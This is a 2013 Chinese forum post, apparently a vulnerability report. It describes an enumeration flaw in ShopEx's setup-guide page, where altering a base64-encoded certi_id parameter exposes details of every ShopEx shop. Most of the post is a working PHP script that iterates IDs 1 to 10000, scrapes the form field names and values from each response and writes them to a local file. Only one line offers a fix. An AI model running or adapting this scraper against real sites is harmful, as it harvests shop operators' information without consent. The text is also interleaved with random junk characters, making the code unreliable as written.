|
|
简要描述:8 O9 s3 ?0 X" H0 @% ?
ShopEx某接口缺陷,可遍历所有网站7 u3 d9 o- M& V' y4 m; D
详细说明:
. `* A, s1 Y4 l8 n+ B: s问题出现在shopex 网店使用向导页面 ! C4 `, r$ G! g( M& `) _9 X% ]
# `3 R! K+ s4 r4 y2 s
" p7 h9 r I. Q4 Z
z+ v; X4 @- E, k8 K' qhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=3 k: q) S- L; S: {8 c
8 t; ]$ j" _1 v- b4 {# `: P
* v5 P2 ]- [; u5 d1 w
1 R% L( g7 M2 |% K F9 Z3 W2 s prefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}1 J( m# w) y6 M
) D1 v" G. a$ m( U
( |, g# w7 r/ ?
; @# B3 f3 \4 W( y我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
. u! g2 H$ v2 F2 Q
5 @3 i: m8 g% J4 o6 S9 h' O
* Q5 r( T& ?% Q9 x# ]" d
$ m0 D- N) v1 a8 Q& D9 y* m<?php
% p6 d" D+ { A3 d! O6 ^" `* z9 W( l0 s! G
for ($i=1; $i < 10000; $i++) { //遍历
% j# w; b, H/ G1 I1 Z& e7 @; C9 D0 _
ShowshopExD($i);3 N" @: V+ u" u9 N
% t! Q# Y% [; V" ^* D" [" X }
1 A% L. C! H* B& S$ d
; L7 t9 _2 F% V! J7 W function ShowshopExD($cid) {6 O" F4 x; u$ Q. \. y, j& v" q7 ?* G
3 q' S0 _) n5 F8 f5 I! [- d $url='http://guide.ecos.shopex.cn/step2.php';/ f( @5 e; r" s1 x! S( ~
& Q* T; x' Z7 S9 F& j8 U
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
# U. y) z7 C: ?- }
; t4 _% i* x3 f $url = $url.'?refer='.$refer;8 P' }0 }* r- N- W$ z8 R
1 k; [1 b) l0 ^, e+ X3 s, c. w
$ch = curl_init($url);
& v) X& U0 C* S( r" G
2 g! A; S4 j9 y, ~- C/ o curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;- F# ~) f' J* _& Q6 @% ^0 e8 Y
& j& j# w" X8 r
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
3 W2 Z5 `( P) [6 J- n8 h7 ]# g. ^4 J/ U, n: z: l7 `
$result = curl_exec($ch);2 g' k- n& i) L1 E6 O% V
4 W) C9 G& R% @) o, [% Y2 c8 o $result = mb_convert_encoding($result, "gb2312", "UTF-8");9 E& P: _: P$ \( m
* Q: p' J# w( I( @* c
if(strpos($result,$refer))
# t6 E9 \. H. q Z: @9 C; _" A5 Z
i- ?# i* Z7 z, d5 q {
* }4 J8 L7 I1 U) @3 R7 h8 t& U5 K% r1 Q6 H7 R; }
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件0 j" J$ _0 G9 H1 z2 K! O
4 y" p" x. w1 L: M" s1 A& b ^
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
; t, ~7 M* F5 K( }% t
1 R5 l0 I1 f# X" D8 o3 j foreach ($value[1] as $key) {1 a( e& x$ k- n& E/ G# T5 S! N
* C2 A" Z L; H. a* B preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);8 Q& [7 _7 n# p, @
$ g H, F4 H$ x _1 u, w echo $res[1][0].':'.$res[3][0]."\r\n";
' m. Y1 C3 }: c3 u
- n9 d( b+ I! m+ e' M $col =$res[1][0].':'.$res[3][0]."\r\n";
4 F4 O) l* F. g- b) M" P8 f! ?; D4 n c" A; w7 ]
fwrite($fp, $col, strlen($col));
# ~1 S+ \7 d- W: ?; z
6 C1 N- }. @+ D$ T" j }
, \" a8 e$ |! Q6 I$ W) d% h) O7 i$ w' S% p
echo '--------------------------------'."\r\n";% d2 ?% m1 b/ X4 Y+ t& C
, k0 ]* v2 V! N
fclose($fp); 6 l- q" H+ e6 l9 _; w3 N; L( z
1 u& w7 M: p V }9 y% U8 c7 A$ k2 j. x; _0 l
8 { W6 G. G, F) p flush();3 t2 y5 w" h: s: b
" }. i, N" N- }" r' q6 M( _
curl_close($ch);1 Y. h' P( Q/ l) q, V7 A0 x
7 U0 `; g3 k7 [- j; s2 [$ P }
0 N4 D* r7 s( B1 H3 ^
$ c: J- d0 ]% S! H+ ^3 p?>& q$ I+ `, L2 }, p; }: n
漏洞证明:: ]8 j3 e5 H. }0 \4 t% W7 y* a
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
6 ]# n8 s \% z% D8 f& ^8 l: b/ irefer换成其他加密方式3 l' n0 v6 n. o
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对